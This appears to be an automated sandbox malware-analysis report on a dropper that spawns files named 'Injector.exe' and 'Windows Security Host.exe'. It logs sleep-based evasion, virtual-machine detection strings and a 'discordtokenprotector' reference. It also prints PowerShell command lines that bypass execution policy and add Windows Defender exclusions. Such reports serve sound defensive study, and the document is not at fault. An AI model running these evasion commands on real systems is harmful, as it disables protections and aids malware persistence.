                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596532Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596310Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595544Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595384Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594576Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594226Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 571341Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Windows Security Host.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Windows Security Host.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWindow / User API: threadDelayed 9757Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeWindow / User API: threadDelayed 4004Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeWindow / User API: threadDelayed 5706Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6157
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3586
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6183
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3441
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6984
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2771
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2603
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7056
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe TID: 2960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6660Thread sleep count: 276 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6660Thread sleep count: 204 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 2376Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe TID: 7364Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599756s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599630s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599391s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599266s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599157s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -599032s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598921s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597986s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597708s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597454s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597217s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596310s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -596079s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595704s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595544s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595384s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -595063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594576s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594226s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -594110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248Thread sleep time: -571341s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 6183 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 3441 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 6984 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 2771 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060Thread sleep count: 2603 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060Thread sleep count: 7056 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Users\user\Windows Security Host.exe TID: 5532Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Windows Security Host.exe TID: 1568Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Windows Security Host.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599756Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599630Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599500Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599266Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599032Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598921Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598812Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597986Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597708Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597217Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596657Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596532Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596310Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595544Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595384Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594576Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594226Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 571341Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Windows Security Host.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Windows Security Host.exeThread delayed: delay time: 922337203685477
                    Source: Amcache.hve.23.drBinary or memory string: VMware
                    Source: Injector.exe.0.drBinary or memory string: vboxservice
                    Source: Amcache.hve.23.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.23.drBinary or memory string: VMware, Inc.
                    Source: Injector.exe.0.drBinary or memory string: vmwareuser
                    Source: Amcache.hve.23.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.23.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.23.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.23.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.23.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Injector.exe.0.drBinary or memory string: vmsrvc
                    Source: Injector.exe.0.drBinary or memory string: vmwaretray
                    Source: Amcache.hve.23.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.23.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.23.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Injector.exe, 00000002.00000002.1311862099.00000242BBB96000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B564000.00000004.00000020.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1593249009.000001EF9506F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.drBinary or memory string: vboxtray
                    Source: Amcache.hve.23.drBinary or memory string: vmci.sys
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.drBinary or memory string: qemu-ga
                    Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.23.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.23.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.drBinary or memory string: vmusrvc
                    Source: Injector.exe.0.drBinary or memory string: vmwareservice+discordtokenprotector
                    Source: Amcache.hve.23.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.23.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.23.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.23.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.23.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.23.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Injector.exe.0.drBinary or memory string: vmtoolsd
                    Source: Amcache.hve.23.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.23.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.23.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.23.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                    Source: Amcache.hve.23.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: BootstrapperV1.23.exe PID: 4064, type: MEMORYSTR
                    Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Injector.exe "C:\Users\user~1\AppData\Local\Temp\Injector.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" Jump to behavior
